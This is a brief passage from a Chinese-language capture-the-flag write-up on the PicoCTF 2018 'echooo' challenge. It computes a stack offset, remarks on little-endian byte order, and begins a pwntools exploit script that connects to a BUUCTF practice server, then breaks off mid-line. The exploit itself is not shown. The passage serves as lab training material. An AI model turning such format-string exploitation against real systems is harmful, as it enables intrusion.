offset=11+((0x8c-0x4c)/4) 因为栈是小端序储存,高字节在下方,所以需要转换一下 exp如下 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 frompwn import* #r=process('./PicoCTF_2018_echooo') r=remote('node4.buuoj.cn',28181) offest=11+(